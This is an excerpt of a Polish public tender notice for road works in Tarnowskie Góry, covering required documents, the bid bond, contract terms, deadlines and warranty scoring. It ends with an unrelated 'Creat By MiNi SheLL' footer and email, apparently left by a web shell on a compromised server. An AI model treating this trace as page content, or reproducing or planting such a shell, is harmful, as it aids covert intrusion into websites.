wykonane należycie,<br/> w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i<br/> prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/> przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o<br/> obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty– wzór stanowi Załącznik nr 4 do SWZ; Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót<br/> budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy robót<br/> budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył; 2) Wykaz osób, skierowanych<br/> Strona 4<br/>przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych kierowanie robotami budowlanymi,<br/> wraz z informacjami na temat ich kwalifikacji zawodowych (posiadanych uprawnień do kierowania robotami<br/> budowlanymi, wpisem do izby inżynierów) oraz informacją o podstawie do dysponowania tymi osobami - wzór<br/> stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>7.1. Formularz oferty zgodnie z Załącznikiem nr 3a do SWZ.<br/>7.2. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>7.3. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia – dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/><br/>UWAGA: Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej, kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/><br/>7.4. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, jeśli ofertę składa osoba prowadząca działalność gospodarczą lub podmiot jest wpisany do w/w rejestrów.<br/><br/>7.5 Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 3b do SWZ w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W przypadku wspólnego ubiegania się <br/>o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy <br/>z Wykonawców. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu.<br/>7.6.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wzór oświadczenia o spełnianiu warunków stanowi Załącznik nr 3b do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, Wykonawca przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/><br/>7.7.Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>w przypadku, o którym mowa w art. 117 ust. 4 ustawy p.z.p., z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi Załącznik nr 3c do SWZ).<br/><br/>7.8. Zobowiązanie, o którym mowa w art. 118 ust. 4 p.z.p., w przypadku polegania na zasobach podmiotu udostępniającego zasoby Wykonawcy (wzór oświadczenia stanowi Załącznik nr 3d do SWZ).<br/><br/>7.9. Kosztorys ofertowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium:<br/>40 000,00 zł (słownie: czterdzieści tysięcy złotych 00/100) <br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. <br/>2.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024r. poz. 419). <br/>3.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na następujący rachunek bankowy:<br/>Bank Millenium SA: 64 1160 2202 0000 0006 3523 8102 <br/>z dopiskiem „Rozbudowa układu drogowego w rejonie ulic: Królika, Szymały, Dolna, Lewka <br/>w Tarnowskich Górach”- etap D”. - MZUiM.263.9.2025.TP2.RB.<br/>	Uwaga nr 1<br/>	Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.<br/><br/>4.	Wadium wnoszone w postaci niepieniężnej należy złożyć wraz z ofertą poprzez Platformę przetargową - w wydzielonym, odrębnym pliku. Należy przekazać oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/><br/>Uwaga nr 2<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy Prawo zamówień publicznych, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Mając na uwadze art. 117 ust. 1 ustawy Zamawiający zastrzega, że w sytuacji składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy, warunek 4.1 albo 4.2, musi zostać spełniony w całości przez Wykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca – brak możliwości tzw. sumowania zasobów w zakresie doświadczenia. Dla pozostałych warunków dotyczących zdolności technicznej lub zawodowej – Zamawiający dopuszcza łączne spełnienie warunków przez Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian zawarty jest z Projektowanych postanowieniach Umowy Załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mzuimtg.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-02 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca podaje okres gwarancji w miesiącach (j.w.), przy czym minimalny okres gwarancji wynosi 60 miesięcy. <br/>•	W przypadku zaoferowania okresu gwarancji krótszego niż 60 miesięcy Zamawiający uzna, że oferta Wykonawcy nie odpowiada wymogom ogłoszenia o zamówieniu i podlega odrzuceniu.<br/>•	W przypadku zaoferowania okresu gwarancji dłuższego niż 84 miesiące Zamawiający do oceny oferty przyjmie okres 84 miesięcy, do umowy natomiast wpisany zostanie okres gwarancji zgodnie z treścią oferty (w przypadku, gdy oferta tego Wykonawcy zostanie wybrana jako najkorzystniejsza).<br/>•	W przypadku zaoferowania okresu gwarancji powyżej 60 miesięcy, jednakże nie będącego krotnością liczby 12 miesięcy, Zamawiający przyzna punkty za każdą krotność pełnych 12 miesięcy wskazanych przez Wykonawcę. <br/>•	Brak wskazania w ofercie jakiegokolwiek okresu gwarancji będzie równoznaczne z zaoferowaniem minimalnego okresu gwarancji i rękojmi tj. 60 miesięcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com